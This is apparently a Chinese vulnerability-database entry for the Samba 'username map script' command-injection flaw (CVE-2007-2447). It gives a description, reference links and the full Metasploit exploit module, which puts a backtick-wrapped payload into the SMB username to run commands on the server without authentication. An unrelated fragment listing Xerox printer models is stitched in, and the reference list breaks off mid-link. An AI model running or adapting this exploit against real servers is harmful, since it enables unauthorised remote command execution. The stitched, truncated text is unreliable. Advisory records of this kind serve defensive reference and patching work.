Samba MS-RPC Shell命令注入漏洞

https://www.exploit-db.com/exploits/16320
https://www.securityfocus.com/bid/23972
https://cxsecurity.com/issue/WLB-2007050054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-286

Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。Samba在处理用户数据时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意命令。Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入的话，就可能允许攻击者以nobody用户的权限执行任意命令。

##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SMB

	# For our customized version of session_setup_ntlmv1
	CONST = Rex::Proto::SMB::Constants
	CRYPT = Rex::Proto::SMB::Crypt

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba "username map script" Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulerability in Samba
				versions 3.0.20 through 3.0.25rc3 when using the non-default
				"username map script" configuration option. By specifying a username
				containing shell meta characters, attackers can execute arbitrary
				commands.

				No authentication is needed to exploit this vulnerability since
				this option is used to map usernames prior to authentication!
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10040 $',
			'References'     =>
				[
					[ 'CVE', '2007-2447' ],
					[ 'OSVDB', '34700' ],
					[ 'BID', '23972' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
					[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => true, # root or nobody user
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							# *_perl and *_ruby work if they are installed
							# mileage may vary from system to system..
						}
				},
			'Targets'        =>
				[
					[ "Automatic", { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 14 2007'))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end


	def exploit

		connect

		# lol?
		username = "/=`nohup " + payload.encoded + "`"
		begin
			simple.client.negotiate(false)
			simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
		rescue ::Timeout::Error, XCEPT::LoginError
			# nothing, it either worked or it didn't ;)
		end

		handler
	end

end

Xerox WorkCentre Pro 275 Xerox WorkCentre Pro 265 Xerox WorkCentre Pro 255 Xerox WorkCentre Pro 245 Xerox WorkCentre Pro 238 Xerox WorkCentre Pro 232 Xer

来源:VU#268336
名称:VU#268336
链接:http://www.kb.cert.org/vuls/id/268336
来源:BUGTRAQ
名称:20070513[SAMBA-SECURITY]CVE-2007-2447:RemoteCommandInjectionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/468565/100/0/threaded
来源:www.samba.org
链接:http://www.samba.org/samba/security/CVE-2007-2447.html
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1366
来源:UBUNTU
名称:USN-460-1
链接:http://www.ubuntu.com/usn/usn-460-1
来源:TRUSTIX
名称:2007-0017
链接:http://www.trustix.org/errata/2007/0017/
来源:SECTRACK
名称:1018051
链接:http://www.securitytracker.com/id?1018051
来源:BID
名称:23972
链接:http://www.securityfocus.com/bid/23972
来源:BUGTRAQ
名称:20070515FLEA-2007-0017-1:samba
链接:http://www.securityfocus.com/archive/1/archive/1/468670/100/0/threaded
来源:REDHAT
名称:RHSA-2007:0354
链接:http://www.redhat.com/support/errata/RHSA-2007-0354.html
来源:OSVDB
名称:34700
链接:http://www.osvdb.org/34700
来源:VUPEN
名称:ADV-2007-1805
链接:http://www.frsirt.com/english/advisories/2007/1805
来源:DEBIAN
名称:DSA-1291
链接:http://www.debi